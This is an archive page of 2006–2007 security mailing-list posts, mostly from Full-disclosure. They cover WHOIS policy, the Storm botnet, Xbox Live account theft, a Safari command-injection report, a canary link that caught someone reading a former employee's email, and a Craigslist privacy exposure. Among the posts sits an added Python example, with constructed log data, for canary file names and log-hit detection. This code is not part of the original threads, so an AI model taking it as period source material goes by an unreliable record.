-- Forwarded message -- Date: Sun, 16 Sep 2007 22:45:08 -0400 From: WWWhatsup [EMAIL PROTECTED] Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: [Discuss] Public comments are invited on GNSO Council's WHOIS reports and recommendations. http://www.icann.org/announcements/announcement-2-14sep07.htm Public comments are invited via email until 00:00 UTC (17:00 PDT) on 30 October 2007 on the GNSO Council's WHOIS reports and recommendations. Submit comments to: [EMAIL PROTECTED] View comments at http://forum.icann.org/lists/whois-comments-2007/. Background In March, 2007, a WHOIS Task Force convened by the GNSO Council in June, 2005 completed its final report. The Task Force was asked to address important questions related to WHOIS. Key questions included the purpose of WHOIS service, which information should be available to the public, how to improve WHOIS accuracy and how to deal with conflicts between WHOIS requirements and relevant privacy laws. In the final report, a simple majority of members of the WHOIS Task Force endorsed a proposal called the Operational Point of Contact (OPOC). Under OPOC, every registrant would identify a new operational contact and the technical and administrative contact details would no longer be displayed. The final WHOIS Task Force Report of 12 March, 2007 is posted at http://gnso.icann.org/issues/whois-privacy/whois-services-final-tf-report-12mar07.htm. Following completion of the Task Force Report and public comment period, on 28 March the GNSO Council issued a resolution creating a WHOIS Working Group to examine three issues and to make recommendations concerning how current policies may be improved to address these issues: 1. to examine the roles, responsibilities and requirements of the OPOC, and what happens if they are not fulfilled; 2. to examine how legitimate interests will access unpublished registration data; and 3. 
to examine whether publication of registration contact information should be based on the type of registered name holder (legal vs. natural persons) or the registrant's use of a domain name. The Whois Outcomes Working Group Report was finalized on 20 August, 2007. It is posted at http://gnso.icann.org/drafts/icann-whois-wg-report-final-1-9.pdf [PDF, 213K]. On 6 September 2007, the GNSO Council approved a resolution which, among other things, establishes a schedule for consideration of the WHOIS Task Force Report and the WHOIS Working Group Report. This schedule includes solicitation of further public comments and culminates in a public Council discussion and vote on 31 October 2007 during the Los Angeles ICANN. In addition, the resolution calls for ICANN staff to prepare a type of draft final report that references the Task Force Report, the Working Group Charter and the Working Group Report and which includes an overall description of the process. The following document, entitled, Staff Overview of Recent GNSO WHOIS Activity [PDF, 77K], has been prepared in response to the Council Resolution. It contains the full text of the GNSO resolution and the schedule for GNSO Council consideration of the reports. Again, further public comments are invited via email until 00:00 UTC (17:00 PDT) on 30 October 2007 on the GNSO Council's WHOIS reports and recommendations referenced above and summarized in the Staff Overview of Recent GNSO WHOIS Activity [PDF, 77K]. Submit comments to: [EMAIL PROTECTED] View comments at http://forum.icann.org/lists/whois-comments-2007/. -- Glen de Saint Géry GNSO Secretariat - ICANN gnso.secretariat[at]gnso.icann.org http://gnso.icann.org --- WWWhatsup NYC http://pinstand.com - http://punkcast.com --- ___ Discuss mailing list [EMAIL PROTECTED] http://lists.isoc-ny.org/mailman/listinfo/discuss
Re: [Full-disclosure] Fake claim by Vaibhav Pandey regarding Googleacknowledging a vulnerability
I'm not saying that Pandey found or didnt find an orkut issue. However, Google Online Pvt Ltd is a subsidary of Google Inc. Also if you do a little searching around you can find 'a' Tanushree Baruah that supposedly is part of the orkut Operations Team. I dont know what your motivation for going on a rant about how unskilled others are, but hopefully it makes you feel good. A better contribution to the list might be finding your own bug or vulnerability and publishing it to FD vs. hiding behind an anonymous email spouting off about nothing of value. Jay - Original Message - From: Fake Reports [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Fri, 7 Sep 2007 10:39:20 -0700 (PDT) Subject: [Full-disclosure] Fake claim by Vaibhav Pandey regarding Googleacknowledging a vulnerability India is full of Ankit Fadia's and Aditya K. Sood's. While I do not intend to ridicule Indian security researchers because some of them are truly good and have made good disclosures but people like Ankit Fadia and Aditya are a disgrace to India and the full-disclosure community. And a new such budding lame-ass is Vaibhav Pandey. Vaibhav Pandey has made a false claim of Google acknowledging a vulnerability:- http://technofriends.wordpress.com/2007/09/06/google-acknowledges-orkut-bug/ Notice the signature of the so-called acknowledgement from Google:- [QUOTE] Tanushree Baruah Spam/Product teams, orkut Google Online Pvt Ltd India [/QUOTE] Where on earth is this company called Google Online Pvt Ltd? Isn't the company called Google Inc.? And WTF is Spam/Product teams? This guy hasn't even bothered to check the Google's security page or he would have known that it is the Google security team that responds to security incidents.
[Full-disclosure] World's most powerful supercomputer goes online (fwd)
-- Forwarded message -- Date: Fri, 31 Aug 2007 18:23:57 +1200 From: Peter Gutmann [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: World's most powerful supercomputer goes online This doesn't seem to have received much attention, but the world's most powerful supercomputer entered operation recently. Comprising between 1 and 10 million CPUs (depending on whose estimates you believe), the Storm botnet easily outperforms the currently top-ranked system, BlueGene/L, with a mere 128K CPU cores. Using the figures from Valve's online survey, http://www.steampowered.com/status/survey.html, for which the typical machine has a 2.3 - 3.3 GHz single core CPU with about 1GB of RAM, the Storm cluster has the equivalent of 1-10M (approximately) 2.8 GHz P4s with 1-10 petabytes of RAM (BlueGene/L has a paltry 32 terabytes). In fact this composite system has better hardware resources than what's listed at http://www.top500.org for the entire world's top 10 supercomputers:
BlueGene/L: 128K CPUs, 32TB
Jaguar: 22K CPUs, 46TB
Red Storm: 26K CPUs, 40TB
BGW: 40K CPUs, 10TB
New York Blue: 37K CPUs, 18TB
ASC Purple: 12K CPUs, 49TB
eServer Blue Gene: ?
Abe: 10K CPUs, 10TB
MareNostrum: 10K CPUs, 20GB
HLRB-II: 10K CPUs, 39GB
This may be the first time that a top 10 supercomputer has been controlled not by a government or megacorporation but by criminals. The question remains, now that they have the world's most powerful supercomputer system at their disposal, what are they going to do with it? And I wonder what the LINPACK rating for Storm is? Peter. - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: [Full-disclosure] Security Contact for FOX Sports
May try: Fox Sports Interactive Media, LLC. Business Legal Affairs 407 N. Maple Drive Beverly Hills, California 90210 Telephone: (310) 969-7192 e-mail: [EMAIL PROTECTED] Jay - Original Message - From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Tue, 21 Aug 2007 18:22:27 -0400 Subject: [Full-disclosure] Security Contact for FOX Sports Does anyone have a security contact for FOX sports?
Re: [Full-disclosure] Xbox live accounts are being stolen (is thetraining working?)
This list is about Full Disclosure, exploits vulnerabilities etc. No one gives a rat arse whether some whiny n00bz cant play Halo. Find another list to gripe about customer service issues. Furthermore there isnt any proof provided that ppl didnt get compromised by getting phished themselves. I'm sure the same mindless twitz that are whining here have to have a myspace account spilling all their personal information anyway. Jay - Original Message - From: Kevin Finisterre (lists) [mailto:[EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk,[EMAIL PROTECTED] Sent: Thu, 9 Aug 2007 11:44:50 -0400 Subject: Re: [Full-disclosure] Xbox live accounts are being stolen (is thetraining working?) Which is fine... I was more than anything pointing out that this individual still chose to ignore company policy. And being stereotypical it sounded like the *same* call center I called into before, so if she is doing it I am sure others are as well. Hopefully she had minimal access to personal data. And I guess I was also highlighting the fact that no one was really paraded around for us to tar and feather for stealing accounts. Did you guys actually catch someone or did they get off Scott free? This issue had honestly been out of my mind for some time, I was quite surprised to hear of it happening again. -KF On Aug 9, 2007, at 11:26 AM, Scott Hirnle wrote: Hi Kevin, For Hardware calls, we don't verify the same information as we do on Live calls. The reason for this is because some people (in fact many people) who call into the hardware queue are not even Xbox Live customers. Therefore, they don't have the same data to verify against and as a result, our agents don't have visibility into it and our entitlement process is different for each line of business. 
Scott -Original Message- From: Kevin Finisterre (lists) [mailto:[EMAIL PROTECTED] Sent: Thursday, August 09, 2007 8:21 AM To: full-disclosure@lists.grok.org.uk Cc: Ashley Wilson Subject: Re: [Full-disclosure] Xbox live accounts are being stolen (is the training working?) I find it kind of ironic that my Xbox broke last night after an update and I am now on the phone with a Xbox live representative. After the whole stolen accounts fiasco I remember calling in an having techs flat out refuse to work with you until you verified your full name, address, phone number, gamer tag, xbox console serial number and email address used on the account. I just finished talking to a tech about my xbox after only giving her my First name, Address and Phone number (I couldn't give my serial because my xbox is not near me). After asking to speak with her supervisor about some other issues I asked him to remind me of what information should be verified prior to speaking with someone. He told me that First and Last name, Address, Phone Number, Email and Serial Number had to be verified and if any one item was missing or not available to be verified via other means then they have been instructed to not speak with you. I asked him what happened with Gamertag verification and he stated that only applied to Xbox live issues and it was not verified for Xbox console issue. I didn't bother telling him the tech that passed me on to him didn't quite verify all the data, I simply said thanks and hung up. At the very least this may help illustrate that no amount of training can fully curb human behavior. The tech I talked to had no problem ignoring the lack of serial number and email address on my account. So Ashley... yeah I guess it is entirely possible that accounts *can* still be stolen. Hell for all I know it could be the same kids since no one was ever produced as the culprit of the previous caper. Good luck! -KF
Re: [Full-disclosure] Tcpdfilter
Try the wayback machine. http://web.archive.org/web/*/http://freshmeat.net/ Jay - Original Message - From: scott [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wed, 13 Jun 2007 23:32:31 -0400 Subject: [Full-disclosure] Tcpdfilter Anyone know where I can get a copy of tcpdfilter? The site on Freshmeat is gone and Googling doesn't come up with anything Or is there a replacement for it? Any help will be much appreciated, Regards, Scott
Re: [Full-disclosure] Safari for Windows, 0day URL protocol handler command injection
Interesting thing to think about ... Does it benefit Apple to have an insecure browser on Windows? If the millions of clueless computer users get owned will they be able to understand that it was Safari's fault or just that their windows box got compromised and now they have grief and financial loss. Jay - Original Message - From: dump [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk,[EMAIL PROTECTED] Sent: Tue, 12 Jun 2007 18:31:38 +0200 Subject: Re: [Full-disclosure] Safari for Windows,0day URL protocol handler command injection Steven Adair wrote: Looks like a few others have been found: http://erratasec.blogspot.com/2007/06/nce.html Steven securityzone.org Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser. There is a URL protocol handler command injection vulnerability in Safari for Windows that allows you to execute shell commands with arbitrary arguments. This vulnerability can be triggered without user interaction simply by visiting a webpage. The full advisory and a working Proof of Concept exploit can be found at Page is dead but sound like old stuff reported years ago: http://www.securityfocus.com/bid/10406 just that they fixed it at the helper level not at safari level (well it was the right thing to do!). but then they prolly forgot about it and released safari for windows. ^ ^ this said its kinda nothing special to be able to read old advisory to find this kind of bugs :) (and its the right thing to do, too!) 2hours is even long :D
Re: [Full-disclosure] You shady bastards.
On Wed, 6 Jun 2007, J. Oquendo [EMAIL PROTECTED] wrote: H D Moore wrote: Hello, Some friends and I were putting together a contact list for the folks attending the Defcon conference this year in Las Vegas. My friend sent out an email, with a large CC list, asking people to respond if they planned on attending. The email was addressed to quite a few people, with one of them being David Maynor. Unfortunately, his old SecureWorks address was used, not his current address with ErrattaSec. Since one of the messages sent to the group contained a URL to our phone numbers and names, I got paranoid and decided to determine whether SecureWorks was still reading email addressed to David Maynor. I sent an email to David's old SecureWorks address, with a subject line promising 0-day, and a link to a non-public URL on the metasploit.com web server (via SSL). Twelve hours later, someone from a Comcast cable modem in Atlanta tried to access the link, and this someone was (confirmed) not David. SecureWorks is based in Atlanta. All times are CDT. I sent the following message last night at 7:02pm. --- From: H D Moore hdm[at]metasploit.com To: David Maynor dmaynor[at]secureworks.com Subject: Zero-day I promised Date: Tue, 5 Jun 2007 19:02:11 -0500 User-Agent: KMail/1.9.3 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: 200706051902.11544.hdm[at]metasploit.com Status: RO X-Status: RSC https://metasploit.com/maynor.tar.gz --- Approximately 12 hours later, the following request shows up in my Apache log file. 
It looks like someone at SecureWorks is reading email addressed to David and tried to access the link I sent: 71.59.27.152 - - [05/Jun/2007:19:16:42 -0500] GET /maynor.tar.gz HTTP/1.1 404 211 - Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 This address resolves to: c-71-59-27-152.hsd1.ga.comcast.net The whois information is just the standard Comcast block boilerplate. --- Is this illegal? I could see reading email addressed to him being within the bounds of the law, but it seems like trying to download the 0day link crosses the line. Illegal or not, this is still pretty damned shady. Bastards. -HD Why would it be illegal if his former employer accessed his email using this method. The information going to their network is considered their property and they could do as they see fit. I could see if in your email you included the almost always ignored disclaimer bs though: THIS EMAIL IS INTENDED FOR THE RECIPIENT'S EYES ONLY. YOU WILL LIKELY IGNORE THIS ANYWAY BUT USING THIS STUPIDLY CRAFTED CONFIDENTIALITY DISCLAIMER, I WILL FILL MORE SPACE IN YOUR INBOX AND GENERATE MORE POINTLESS BANDWIDTH USAGE ON YOUR NETWORK. IF YOU ARE NOT THE INTENDED RECIPIENT READING THIS EMAIL AND OR ATTACHMENTS LINKS ETAL WILL RESULT IN US PRETENDING TO HIRE A LAWYER AND DOING SOMETHING ABOUT IT. I know how many times I've seen these listed with someone shooting off information to mailing lists to do an oops f*** I sent that to the wrong place... What are the options now? Sue everyone who read it? Gash their eyes out. Normally if I were going to send out an email that was *THAT* confidential, I personally do two things: 1) Call the person to make sure they're available to get it. If not its not sent until they're ready. 
2) Secondly if I have to post something on my website for someone's personal viewing, I usually do something like: $ echo theirname|md5 6a9c1e04624bcc81a84800b8aa10a1f1 Where the checksum becomes the file and I send them the link to the file. What are the odds of someone finding that checksum... Highly unlikely. -- J. Oquendo Ah, something like. Likely in practice your file name is saltier, and you can taste the nonce. oo--JS. http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato
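HD's canary check (a unique link watched in the web server log) and the salt-and-nonce point in the reply to the md5-of-a-name scheme fit together; the following is an added example, not code from anyone in the thread. It assumes Apache combined log format and a server-side secret key; the key, recipient names and log lines are constructed for the demo.

```python
"""Unguessable canary file names plus detection of hits in an Apache log.
Added example (not from the thread); key, recipients and log lines are constructed."""
import hashlib
import hmac
import re
import secrets
from typing import Dict, List, Optional, Sequence

# Apache "combined" log format, the shape of the 404 line quoted in the thread.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Canary paths look like /<24 hex nonce>.<16 hex tag>.tar.gz
_CANARY_RE = re.compile(r"^/([0-9a-f]{24})\.([0-9a-f]{16})\.tar\.gz$")


def guessable_name(recipient: str) -> str:
    """The scheme quoted in the thread: md5 of the recipient's name.
    Deterministic, so anyone who can guess the name can recompute the path."""
    return hashlib.md5(recipient.encode()).hexdigest()


def _tag(key: bytes, nonce: bytes, recipient: str) -> str:
    return hmac.new(key, nonce + recipient.encode(), hashlib.sha256).hexdigest()[:16]


def canary_name(recipient: str, key: bytes, nonce: Optional[bytes] = None) -> str:
    """Salted and keyed name: <nonce>.<tag>.  The random nonce makes the path
    unpredictable; the HMAC tag ties it to the recipient so the server can tell
    a real canary hit from an unrelated 404 without keeping a lookup table."""
    nonce = secrets.token_bytes(12) if nonce is None else nonce
    return f"{nonce.hex()}.{_tag(key, nonce, recipient)}"


def recipient_for(path: str, key: bytes, recipients: Sequence[str]) -> Optional[str]:
    """Which recipient was this canary path issued to?  None if the path is
    not a correctly tagged canary for any known recipient."""
    m = _CANARY_RE.match(path)
    if not m:
        return None
    nonce, tag = bytes.fromhex(m.group(1)), m.group(2)
    for r in recipients:
        if hmac.compare_digest(_tag(key, nonce, r), tag):
            return r
    return None


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into a dict, or None if malformed."""
    m = _LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def canary_hits(lines: Sequence[str], key: bytes,
                recipients: Sequence[str]) -> List[Dict[str, str]]:
    """Every request for a valid canary path, with the recipient it was issued to.
    The status code is ignored on purpose: the file need not exist, a 404 (as in
    the thread) is still evidence that the link was followed."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        who = recipient_for(rec["path"], key, recipients)
        if who is not None:
            hits.append({"recipient": who, "ip": rec["ip"], "ts": rec["ts"], "ua": rec["ua"]})
    return hits


# --- constructed sample data (not a real key, not real addresses or log lines) ---
DEMO_KEY = b"demo-only-not-a-real-key"
DEMO_RECIPIENTS = ["maynor", "someone-else"]
DEMO_NONCE = bytes.fromhex("00112233445566778899aabb")  # fixed so the demo is reproducible
DEMO_LOG = [
    # the canary issued to "maynor", fetched later from a client that is not maynor's
    f'203.0.113.5 - - [05/Jun/2007:19:16:42 -0500] "GET /{canary_name("maynor", DEMO_KEY, DEMO_NONCE)}.tar.gz HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 Safari/419.3"',
    # the md5-of-name path: not a tagged canary, so not reported as one
    f'198.51.100.7 - - [05/Jun/2007:20:00:01 -0500] "GET /{guessable_name("maynor")} HTTP/1.1" 404 211 "-" "curl/7.15"',
    # scanner noise that matches the shape but carries a bad tag: rejected by the HMAC check
    '198.51.100.9 - - [05/Jun/2007:21:00:00 -0500] "GET /00112233445566778899aabb.0000000000000000.tar.gz HTTP/1.1" 404 211 "-" "Mozilla/4.0"',
    "not a log line at all",
]

if __name__ == "__main__":
    for h in canary_hits(DEMO_LOG, DEMO_KEY, DEMO_RECIPIENTS):
        print(f'canary for {h["recipient"]} fetched from {h["ip"]} at {h["ts"]} ({h["ua"]})')
```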
Re: [Full-disclosure] Macro threats
On Tue, 5 Jun 2007, Muscarella, Sebastian \(IT\) [EMAIL PROTECTED] wrote: Wanted to ask this forum's opinion on the state of macro threats. While we have not seen too many this past year which were actively exploited, we wanted to know if there are any indications on whether this threat would increase, decrease, become more sophisticated in the next year or two. Any information would be very helpful. We're currently looking at enhancing some security features in-house around Microsoft Office, and want as much intelligence on the topic as possible. Thanks, Sebastian Muscarella Do not use any Microsoft Windows OS nor any Microsoft application which can be run on these OSes. oo--JS.
[Full-disclosure] [tech-geeks] OT: Local computer shop is getting sued by NBA Spurs player (fwd)
-- Forwarded message -- Date: Wed, 23 May 2007 15:32:47 -0500 From: Aaron Hackney [EMAIL PROTECTED] Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [tech-geeks] OT: Local computer shop is getting sued by NBA Spurs player As many of you may or not know, the Spurs are a big deal here in San Antonio. (GO SPURS GO!) Anyhow, one of the stars of the Spurs is suing a local computer shop for $2 mil. http://www.thesmokinggun.com/archive/years/2007/0501071bowen1.html From what I understand. They used an off the shelf hard drive to ghost his PC, install a new drive and then ghost the image back to the pc. They then accidentally sold that hard disk in a pc to some lady. She notices there is stuff already on the disk. Opens up my documents and there is a TON of personal info on this millionaire NBA star From what I understand, it's bad karma coming back to haunt this company. everyone on a different list-serv that I am on has nothing but bad things to say about them, including former employees :P - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [Full-disclosure] [linux-elitists] Gutsy Gibbon to include strictly-free branch (fwd)
-- Forwarded message -- Date: Mon, 16 Apr 2007 19:04:06 -0700 From: Dave Crossland [EMAIL PROTECTED] To: Greg KH [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [linux-elitists] Gutsy Gibbon to include strictly-free branch On 16/04/07, Greg KH [EMAIL PROTECTED] wrote: takes an ultra-orthodox view of licensing: no firmware, drivers, imagery, sounds, applications, or other content which do not include full source materials and come with full rights of modification, remixing and redistribution. There should be no more conservative home, for those who demand a super-strict interpretation of the 'free' in free software. This work will be done in collaboration with the folks behind Gnewsense. Hm, to do this properly it should only boot if you have linuxbios installed, but what's the odds that people will realize that... That depends how nasty proprietary BIOS behave... Intel EFI is a DRM bios, since it has unlimited control of your memory and I/O, and implements a full network stack. So the BIOS can veto your I/O, and report your being veto'd over the network. By design. I know people at banks who are very unhappy with this. They thought they were running GNU/Linux and knew what the whole thing was doing. A few years ago Intel were explaining the cool EFI stuff, how EFI can download a new version of the BIOS and burn it to flash, on its own. They explained how convenient this is - but chaos went off when the banks heard about this. For the banks, like LANL, when we buy a consumer machine, we either demand full, buildable, source code to their BIOS, or that they ship LinuxBIOS, now. 
- http://understandinglimited.com/2007/04/15/fosdem-2007-notes/ If you care about freedom, you'll be aware of this problem, and your next motherboard will be something listed on http://linuxbios.org/Supported_Motherboards - the Gigabyte M57SLI-S4 is the current favourite, and FSF sysad Ward Cunningham has written http://linuxbios.org/M57SLI-S4_Build_Tutorial -- Regards, Dave ___ linux-elitists mailing list [EMAIL PROTECTED] http://allium.zgp.org/cgi-bin/mailman/listinfo/linux-elitists
Re: [Full-disclosure] Vista Reduced Function mode triggered
On Mon, 1 Jan 2007, Poof [EMAIL PROTECTED] wrote: The issues that the original poster is having don't sound anything like normal behavior. One of the scenarios expected in Vista would be a Laptop that's been activated being used in a restricted internet work zone. And if that laptop has been activated normally (The 1-time activation as provided with the Windows install.) it shouldn't go to reduced mode. Further, it'll give a 30 day warning prior to going to reduced mode if it's suddenly deactivated asking for it to be reactivated. (Say a hardware change/etc.) In the short, I am unable to repro this. I'm currently running Vista on two systems; the other system is in a sandbox. (However, was open during the activation process.) Erm, from what I can see from the requirements, Internet is not required as it's in the same format as Audio. The issue is not: How Microsoft treats those whose boxes Microsoft has Trojaned. The issue is: Microsoft should not be root on my computer. And no EULA can take away root from me and grant root to Microsoft on any computer I own. oo--JS. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Geo. Sent: Monday, January 01, 2007 3:35 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered anything in vista's agreement in legalish that could be translated into 'you agree that you feed your software internet' ? http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx Yep, specifies internet under requirements. Should specify unrestricted internet access if you ask me. Geo.
Re: [Full-disclosure] [Discuss-gnuradio] VT receives NSF grant for SDR security (fwd)
-- Forwarded message --
Date: Tue, 19 Dec 2006 10:24:44 -0500
From: David P. Reed [EMAIL PROTECTED]
To: discuss-gnuradio@gnu.org
Subject: Re: [Discuss-gnuradio] VT receives NSF grant for SDR security

Greg - I think the concept of software defined radio being explored by the VT folks is a concept I personally refer to as crippled software radio. It is based on a discredited theory of security that was called a secure kernel when I was a student 30 years ago. In other words - that there is a small, well-defined portion of a system that can be certified separately from the rest of the system, which has the essential property that its *correct* operation *guarantees* that the entire system will be secure according to *all possible interpretations* of the word secure.

I worked on a project of this sort, and am currently ashamed that I helped perpetuate that charade. I can only say that many others helped - it funded lots of work on proving programs correct - on the theory that it was feasible to prove small programs correct, and thus whole systems secure. The big lie, of course, is that the researchers essentially redefined the word secure to mean the trivial notion of security that you couldn't compromise the kernel. Of course today we stare the fraudulence of that idea in the face: phishing, XSS, and other very dangerous attacks do not depend one whit on a failure to secure a kernel of the operating system, or even the kernel of a router. Yet the idea that incorrectness is the same thing as insecurity persists in such ideas as the idea that you need hardware integrity to prevent attacks on radio systems.

I suggest that it is impossible to carry on a dialog with folks like the VT researchers, because they must necessarily buy into the certification of correctness notion of security. If they were concerned with correctness that would be fine - we could carry out a meaningful discussion about the difficulty of determining correctness in a system that is inherently focusing on getting reliable communications through unreliable channels (information theory). But since they play to the gods of deterministic correctness - unreliability doesn't fit in their notion of security - they cannot even consider the idea that there is no kernel that can be certified to reduce risk.

___ Discuss-gnuradio mailing list Discuss-gnuradio@gnu.org http://lists.gnu.org/mailman/listinfo/discuss-gnuradio
Re: [Full-disclosure] Truths in Truth in Caller ID Act
On Mon, 2 Oct 2006, Nancy Kramer wrote:

You are 100 percent right about the US government. The US Constitution may protect US citizens from the government but nothing will protect them from the big telecom companies who will own them and their data unless we enact a new neutrality law in the US.

Regards, Nancy Kramer

Yes. And we know the exact phrasing of the law: require common carriage on fast telecommunications, just as we require it on slow telecommunications. The issue is wiretapping, and interference with private and public communications.

oo--JS.

Webmaster http://www.americandreamcars.com Free Color Picture Ads for Collector Cars One of the Ten Best Places To Buy or Sell a Collector Car on the Web

At 04:48 PM 10/1/2006, Joe Barr wrote:

On Sun, 2006-10-01 at 12:28 -0500, J. Oquendo wrote:

So the United States government wants to pass the Truth in Caller ID act. Humorously it will do little to deter criminals from spoofing their caller ID and scamming innocent victims. Here is the rule/law followed by why it will fail:

The U.S. government will do its duty, that is to say, they will lick the ass of the telecommunications industry lobbyists and do whatever they damn well say.

-- It's a strange world when proprietary software is not worth stealing, but free software is.
[Full-disclosure] [Privacy] Sexbaiting Social Experiment on Craigslist Affects Hundreds (fwd)
-- Forwarded message --
Date: Fri, 08 Sep 2006 09:00:51 -0700
From: Anthony Baker [EMAIL PROTECTED]
To: No List [EMAIL PROTECTED]
Subject: [Privacy] Sexbaiting Social Experiment on Craigslist Affects Hundreds

Hey MB, Was just trolling through some of my RSS feeds and came across this post from www.waxy.org on something that I think might be of interest to many of you. It's a great read -- involves Craigslist, LiveJournal, online privacy, stupidity, and bloggers. What more could you want for your Friday morning? Have to say, the point towards the bottom about how expectations of privacy haven't been challenged yet is so true. Most people have an assumption of privacy, but just aren't aware of how true or false those assumptions are. Enjoy!

-

Recently, a blogger named Simon Owens ran a social experiment on Craigslist. He wandered into the Casual Encounters section of the personal ads where countless men and women were soliciting for no-strings-attached sex and wondered, Is it really that easy? As a test, he composed several ads with different permutations of assumed identity and sexual orientation: straight/bi men/women looking for the opposite/same sex. He then posted it to New York, Chicago, and Houston, and tallied the results. Overwhelmingly and instantly, the ads from the fake women looking for male partners were inundated with responses, sometimes several per minute. All the other ads received lukewarm responses, at best. These results weren't surprising, but some of the observations were... Many of these men used their real names and included personally identifiable information, including work email addresses and home phone numbers. Several admitted they were married and cheating on their spouses. Many included photos, often nude. His first conclusion was very reasonable: If a really malicious person wanted to get on craigslist and ruin a lot of people's lives, he easily could.

Jason Fortuny's Craigslist Experiment

On Monday, a Seattle web developer named Jason Fortuny started his own Craigslist experiment. The goal: Posing as a submissive woman looking for an aggressive dom, how many responses can we get in 24 hours? He took the text and photo from a sexually explicit ad (warning: not safe for work) in another area, reposted it to Craigslist Seattle, and waited for the responses to roll in. Like Simon's experiment, the response was immediate. He wrote, 178 responses, with 145 photos of men in various states of undress. Responses include full e-mail addresses (both personal and business addresses), names, and in some cases IM screen names and telephone numbers. In a staggering move, he then published every single response, unedited and uncensored, with all photos and personal information to Encyclopedia Dramatica (kinda like Wikipedia for web fads and Internet drama). Read the responses (warning: sexually explicit material). Instantly, commenters on the LiveJournal thread started identifying the men. Dissenters emailed the guys to let them know they were scammed. Several of them were married, which has led to what will likely be the first of many separations. One couple in an open marriage begged that their information be removed, as their religious family and friends weren't aware of their lifestyle. Another spotted a fellow Microsoft employee, based on their e-mail address. And it's really just the beginning, since the major search engines haven't indexed these pages yet. After that, who knows? Divorces, firings, lawsuits, and the assorted hell that come from having your personal sex life listed as the first search result for your name. Possibly the strangest thing about this sex baiting prank is that the man behind it is unabashedly open about his own identity. A graphic artist in Kirkland, Washington, Jason has repeatedly posted his contact information, including home phone, address, and photos. He's already received one threat of physical violence. Is he oblivious to the danger, or does he just not care? Since his stated interest is pushing people's buttons, I'm guessing the latter.

Legality and Privacy

But was any law actually broken? Fortuny obviously misrepresented himself under false pretenses, which is itself possibly actionable, but the privacy implications beyond that are very interesting. Does emailing someone your personal information act as an implicit waiver of your right to privacy? I'm not a lawyer, but as far as I can tell, no. If taken to court, he's at risk of two primary civil claims. Intentional infliction of emotional distress, while notoriously hard to prove in court, is certainly easier here based on his own writings. The second, more relevant claim, is public disclosure of private facts. This Findlaw article on the Washingtonienne scandal sums it up nicely: The disclosure must be public. The facts must be private. The plaintiff must
[Full-disclosure] Weird... www.eon8.com
Does anyone know about this site, or the projects related to it? www.eon8.com ? -- Jay Buhrt Achievement Focused Technology, Inc. [EMAIL PROTECTED] 574-538-8944
[Full-disclosure] Hah, Interesting.....
{eon8} Complete

As of July 1st, 2006, the E8 Project has completed. The purpose of this project was to determine the reactions of the internet public to lack of information.

History

The domain eon8.com was chosen, as it is short, easily remembered, and eon9 was already registered. It was originally posted on www.msfn.org, but was promptly removed as 'spam'. It was enough time for it to be copied to other forums throughout December 2005.

Results

We were amazed to discover that the site was instantly linked with terrorism, simply for the fact that it seems mysterious. Evil was the number one first impression people had of the site, in spite of the fact that there are no threats on the site. The only thing Eon 8 says is We don't want you here. Nothing else. Other less disappointing opinions were social experimentation (which was correct), James Bond movie viral marketing, and promotions for video games. For many people, being faced with a countdown timer was an instant reason to try to shut down or hack the site. This is a worrying reaction, that if someone doesn't understand something they must destroy it. As a result, the servers have been hit quite hard these last few days, but luckily 99% of the 'hackers' could easily be described as 'l4me n00bs'. Another worrying example of paranoia was how quickly people would jump to conclusions, such as telephoning the registered owner of a dog seen in a photograph on a server that hosts a page that links to eon8.

Surprises

The folks at Unfiction.com were the most resourceful and inventive, they successfully managed to decrypt several of the 'codes' on the site, forcing them to be re-encrypted using more secure methods.

FAQ

What about eon5.com? Nothing to do with us. Pure coincidence, but worked in our favor.

What about the 8th eon being the end of the world? We picked Eon 8 because Eon 9 was already taken. We didn't know about the significance of this. Eon is a cool sounding word!

Why July 1st? We didn't know how long it would take to get the word out using our subtle promotion methods. We allowed over 6 months.

What do the codes on the site mean? They're mostly randomly generated integers encrypted with md5, but with certain letters removed and replaced. The Logs page is simply based on the current timestamp, encrypted and modified. You can't decrypt them, they really are random numbers.

What is the Deployment Map? They're dots placed over major cities and several random locations, it was done mostly from memory. The random gif filename is an added touch to force a slight delay on loading, which looks more impressive in Internet Explorer, but not as much in Firefox.

